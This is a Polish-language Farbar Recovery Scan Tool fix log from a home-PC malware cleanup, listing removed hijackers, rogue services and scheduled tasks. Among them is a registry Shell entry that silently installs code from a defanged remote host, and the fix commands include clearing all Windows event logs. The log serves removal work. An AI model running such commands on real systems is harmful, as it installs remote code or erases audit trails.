Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 02.01.2018 Uruchomiony przez Hubert (03-01-2018 23:13:26) Run:1 Uruchomiony z C:\Users\Hubert\Desktop Załadowane profile: Hubert & MSSQL$SQLEXPRESS & ReportServer$SQLEXPRESS & MSSQLFDLauncher$SQLEXPRESS (Dostępne profile: Hubert & MSSQL$SQLEXPRESS & ReportServer$SQLEXPRESS & MSSQLFDLauncher$SQLEXPRESS) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\ChromeHTML: -> C:\Program Files (x86)\Dopig\Application\chrome.exe (Google Inc.) <==== UWAGA C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Program Files (x86)\Dopig C:\Users\Hubert\AppData\Local\Dopig C:\Users\Hubert\AppData\Roaming\Dopig C:\Program Files (x86)\FireFox C:\Users\Hubert\AppData\Local\FireFox C:\Users\Hubert\AppData\Roaming\FireFox DeleteKey: HKCU\Software\Dopig DeleteKey: HKLM\SOFTWARE\WOW6432Node\Dopig DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {1CB03AA5-7AC0-4E6C-92FD-87AE62BF1E42} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== UWAGA Task: {6CD70A5B-CFF0-436C-A6B0-68C7E9499088} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe [2017-01-25] () <==== UWAGA C:\windows\psgo C:\ProgramData\wintools C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk MSCONFIG\startupreg: background_fault => "C:\Users\Hubert\AppData\Local\background_fault\aswRD.exe" "C:\Users\Hubert\AppData\Local\background_fault\bf.dll",background_fault_collector MSCONFIG\startupreg: Tv-Plug-In => "C:\Program Files (x86)\Tv-Plug-In\Tv-Plug-In.exe" nogui C:\Users\Hubert\AppData\Local\background_fault HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Run: [CW] => [X] HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [LogonHoursAction] 2 HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [DontDisplayLogonHoursWarnings] 1 HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88NWIdRTkxRYMdM8I1OTqyRkIyOWQQFjLWRjM2OUVYNc== /q <==== UWAGA GroupPolicy\User: Ograniczenia <==== UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1474272565&z=629e3f9ca8d3f5e970e8b8dg1zbm4zbo6mfocwbq3w&from=wpm0616&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1482829952&z=0e8602fd9c6354b14182cbcgazbb1o1b9obtctczbb&from=archer1028&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494321649&z=56e83df585b09ddfdebb057gdz1t9z3c6oeg4qcz9z&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1482829952&z=0e8602fd9c6354b14182cbcgazbb1o1b9obtctczbb&from=archer1028&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} SearchScopes: HKU\S-1-5-21-2619517641-3271199866-1137362701-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494836168&z=0a75cbe4ae5d67e770e0b7dgdzat2z3beccq8geqam&from=che0812&uid=WDCXWD5000LPVX-22V0TT0_WD-WX51A952C6ZU2C6ZU&q={searchTerms} S2 GubedZL; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL) S2 GubZL; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL) S2 Archer; C:\Windows\SysWOW64\svchost.exe [20992 2009-07-14] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL) S2 CSHMDR; C:\Users\Hubert\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S2 glory; C:\Users\Hubert\AppData\Local\glory\glory.dll [809984 2017-06-02] (glory) [Brak podpisu cyfrowego] <==== UWAGA S2 MSLN; C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll [475648 2016-12-28] () [Brak podpisu cyfrowego] <==== UWAGA R2 MVCSrv; C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll [108544 2017-04-05] () [Brak podpisu cyfrowego] <==== UWAGA S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5]<==== UWAGA R2 WinUpdateSrv; C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll [104448 2017-05-05] () [Brak podpisu cyfrowego] C:\Users\Hubert\AppData\Local\CSHMDR C:\Users\Hubert\AppData\Local\glory VirusTotal: C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll VirusTotal: C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll VirusTotal: C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll U0 aswVmm; Brak ImagePath U2 CWASRE; Brak ImagePath U2 snare; Brak ImagePath U3 TBS; Brak ImagePath U2 WinSnare; Brak ImagePath S3 dbx; system32\DRIVERS\dbx.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 L1C; system32\DRIVERS\L1C62x64.sys [X] S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X] S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X] 2018-01-02 17:42 - 2018-01-02 17:42 - 000000000 ____D C:\Users\Hubert\AppData\Roaming\Solvusoft 2018-01-02 17:41 - 2018-01-02 17:42 - 000000000 ____D C:\ProgramData\Solvusoft 2018-01-02 18:21 - 2017-04-27 19:01 - 000000000 ____D C:\Windows\system32\1033 2018-01-03 19:12 - 2016-09-19 09:09 - 000000481 _____ C:\Users\Public\Documents\temp.dat 2018-01-02 13:54 - 2016-09-19 09:09 - 000000000 _____ C:\Users\Public\Documents\report.dat 2017-01-13 23:50 - 2017-01-13 23:50 - 000000000 _____ () C:\Program Files (x86)\metadata 2017-01-13 23:50 - 2017-03-04 18:10 - 000000040 _____ () C:\Program Files (x86)\settings.dat C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Tibia Map Viewer.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Uninstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\View documentation.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia Website.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Uninstall Tibia.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Network Status.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\PokerStars.eu.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Uninstall PokerStars.eu.lnk C:\Users\Hubert\Desktop\Karola\Karolina\Connectify.lnk C:\Users\Hubert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Antaris\Antaris.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Hubert\AppData\Local\Mozilla C:\Users\Hubert\AppData\Roaming\Mozilla C:\Users\Hubert\AppData\Roaming\Profiles Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\Themes /s CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. "HKU\S-1-5-21-2619517641-3271199866-1137362701-1000_Classes\ChromeHTML" => pomyślnie usunięto C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Program Files (x86)\Dopig => pomyślnie przeniesiono C:\Users\Hubert\AppData\Local\Dopig => pomyślnie przeniesiono "C:\Users\Hubert\AppData\Roaming\Dopig" => nie znaleziono C:\Program Files (x86)\FireFox => pomyślnie przeniesiono C:\Users\Hubert\AppData\Local\FireFox => pomyślnie przeniesiono C:\Users\Hubert\AppData\Roaming\FireFox => pomyślnie przeniesiono "HKCU\Software\Dopig" => pomyślnie usunięto "HKLM\SOFTWARE\WOW6432Node\Dopig" => pomyślnie usunięto "HKCU\Software\Firefox" => pomyślnie usunięto "HKLM\SOFTWARE\WOW6432Node\Firefox" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono "HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\00avast" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono "HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => klucz nie znaleziono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1CB03AA5-7AC0-4E6C-92FD-87AE62BF1E42} => niepowodzenie przy usuwaniu klucz. ErrorCode1: 0x00000002 "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CB03AA5-7AC0-4E6C-92FD-87AE62BF1E42}" => pomyślnie usunięto C:\Windows\System32\Tasks\Windows-PG => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6CD70A5B-CFF0-436C-A6B0-68C7E9499088}" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6CD70A5B-CFF0-436C-A6B0-68C7E9499088}" => pomyślnie usunięto C:\Windows\System32\Tasks\WinTOOL => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinTOOL" => pomyślnie usunięto C:\windows\psgo => pomyślnie przeniesiono C:\ProgramData\wintools => pomyślnie przeniesiono C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk => pomyślnie przeniesiono C:\Users\Hubert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => pomyślnie przeniesiono "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\background_fault" => pomyślnie usunięto "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Tv-Plug-In" => pomyślnie usunięto C:\Users\Hubert\AppData\Local\background_fault => pomyślnie przeniesiono "HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CW" => pomyślnie usunięto "HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\LogonHoursAction" => pomyślnie usunięto "HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\DontDisplayLogonHoursWarnings" => pomyślnie usunięto "HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell" => pomyślnie usunięto C:\Windows\system32\GroupPolicy\User => pomyślnie przeniesiono C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-2619517641-3271199866-1137362701-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono "HKLM\System\CurrentControlSet\Services\GubedZL" => pomyślnie usunięto GubedZL => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\GubZL" => pomyślnie usunięto GubZL => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Archer" => pomyślnie usunięto Archer => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\CSHMDR" => pomyślnie usunięto CSHMDR => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\glory" => pomyślnie usunięto glory => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\MSLN" => pomyślnie usunięto MSLN => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\MVCSrv" => pomyślnie usunięto MVCSrv => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\Themes\\DependOnService" => pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\WinUpdateSrv" => pomyślnie usunięto WinUpdateSrv => serwis pomyślnie usunięto C:\Users\Hubert\AppData\Local\CSHMDR => pomyślnie przeniesiono C:\Users\Hubert\AppData\Local\glory => pomyślnie przeniesiono VirusTotal: C:\ProgramData\Microsoft\Phone Tools\CoreCon\12.0\1042\NonSDKAddonLangVer.dll => https://www.virustotal.com/file/82f09339185d79107f3b6df51411714b2d8dfa6d9bd4527110698496626cbe31/analysis/1485852367/ VirusTotal: C:\ProgramData\Package Cache\{0C8D9D70-FA5A-4CA9-763F-D8D93BC099B6}v10.1.14393.795\Installers\Universal_CRT_Tools_x86-x86_en-us.dll => https://www.virustotal.com/file/4644bd630f4084e8fcabcb421e4404789f489e2676b52883fd583efb399676ea/analysis/1501787606/ VirusTotal: C:\ProgramData\Package Cache\{137DE25F-7C3C-DEFE-C45B-990088714B67}v12.2.2793.254\Update\install.dll => https://www.virustotal.com/file/f1ef6887e3041e46efdfdf240508901f3a53a1ad67d411d598edcc6d53261133/analysis/1501787600/ "HKLM\System\CurrentControlSet\Services\aswVmm" => pomyślnie usunięto aswVmm => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\CWASRE" => pomyślnie usunięto CWASRE => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\snare" => pomyślnie usunięto snare => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\TBS" => pomyślnie usunięto TBS => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\WinSnare" => pomyślnie usunięto WinSnare => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\dbx" => pomyślnie usunięto dbx => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\EagleX64" => pomyślnie usunięto EagleX64 => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\L1C" => pomyślnie usunięto L1C => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\CornerSunshineSvc" => pomyślnie usunięto CornerSunshineSvc => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\aswHdsKe" => pomyślnie usunięto aswHdsKe => serwis pomyślnie usunięto C:\Users\Hubert\AppData\Roaming\Solvusoft => pomyślnie przeniesiono C:\ProgramData\Solvusoft => pomyślnie przeniesiono C:\Windows\system32\1033 => pomyślnie przeniesiono C:\Users\Public\Documents\temp.dat => pomyślnie przeniesiono C:\Users\Public\Documents\report.dat => pomyślnie przeniesiono C:\Program Files (x86)\metadata => pomyślnie przeniesiono C:\Program Files (x86)\settings.dat => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Tibia Map Viewer.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\Uninstall.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Map Viewer\View documentation.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia Website.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Tibia.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia\Uninstall Tibia.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Network Status.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\PokerStars.eu.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PokerStars.EU\Uninstall PokerStars.eu.lnk => pomyślnie przeniesiono C:\Users\Hubert\Desktop\Karola\Karolina\Connectify.lnk => pomyślnie przeniesiono C:\Users\Hubert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Antaris\Antaris.lnk => pomyślnie przeniesiono HKCU\Software\Mozilla => klucz nie znaleziono "HKCU\Software\MozillaPlugins" => pomyślnie usunięto "HKLM\SOFTWARE\Mozilla" => pomyślnie usunięto "HKLM\SOFTWARE\MozillaPlugins" => pomyślnie usunięto "HKLM\SOFTWARE\Wow6432Node\Mozilla" => pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz nie znaleziono "HKLM\SOFTWARE\Wow6432Node\MozillaPlugins" => pomyślnie usunięto "C:\Users\Hubert\AppData\Local\Mozilla" => nie znaleziono C:\Users\Hubert\AppData\Roaming\Mozilla => pomyślnie przeniesiono "C:\Users\Hubert\AppData\Roaming\Profiles" => nie znaleziono ========= reg query HKLM\SYSTEM\CurrentControlSet\Services\Themes /s ========= HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Themes Start REG_DWORD 0x2 DisplayName REG_SZ @%SystemRoot%\System32\themeservice.dll,-8192 ErrorControl REG_DWORD 0x1 Group REG_SZ ProfSvc_Group ImagePath REG_EXPAND_SZ %SystemRoot%\System32\svchost.exe -k netsvcs Type REG_DWORD 0x20 Description REG_SZ @%SystemRoot%\System32\themeservice.dll,-8193 ObjectName REG_SZ LocalSystem RequiredPrivileges REG_MULTI_SZ SeAssignPrimaryTokenPrivilege\0SeDebugPrivilege\0SeImpersonatePrivilege FailureActions REG_BINARY 80510100000000000000000003000000140000000100000060EA00000100000060EA00000000000000000000 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Themes\Parameters ServiceDllUnloadOnStop REG_DWORD 0x1 ServiceMain REG_SZ ThemeServiceMain ServiceDll REG_EXPAND_SZ %SystemRoot%\system32\themeservice.dll ========= Koniec Reg: ========= ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 4408570 B Java, Flash, Steam htmlcache => 783192747 B Windows/system/drivers => 25960968 B Edge => 0 B Chrome => 121050 B Firefox => 0 B Opera => 664207648 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 66228 B Public => 0 B ProgramData => 0 B systemprofile => 66228 B systemprofile32 => 160472936 B LocalService => 0 B NetworkService => 4184 B Hubert => 71987318 B MSSQL$SQLEXPRESS => 66228 B ReportServer$SQLEXPRESS => 66228 B MSSQLFDLauncher$SQLEXPRESS => 66228 B RecycleBin => 349639741 B EmptyTemp: => 1.9 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 23:26:31 ====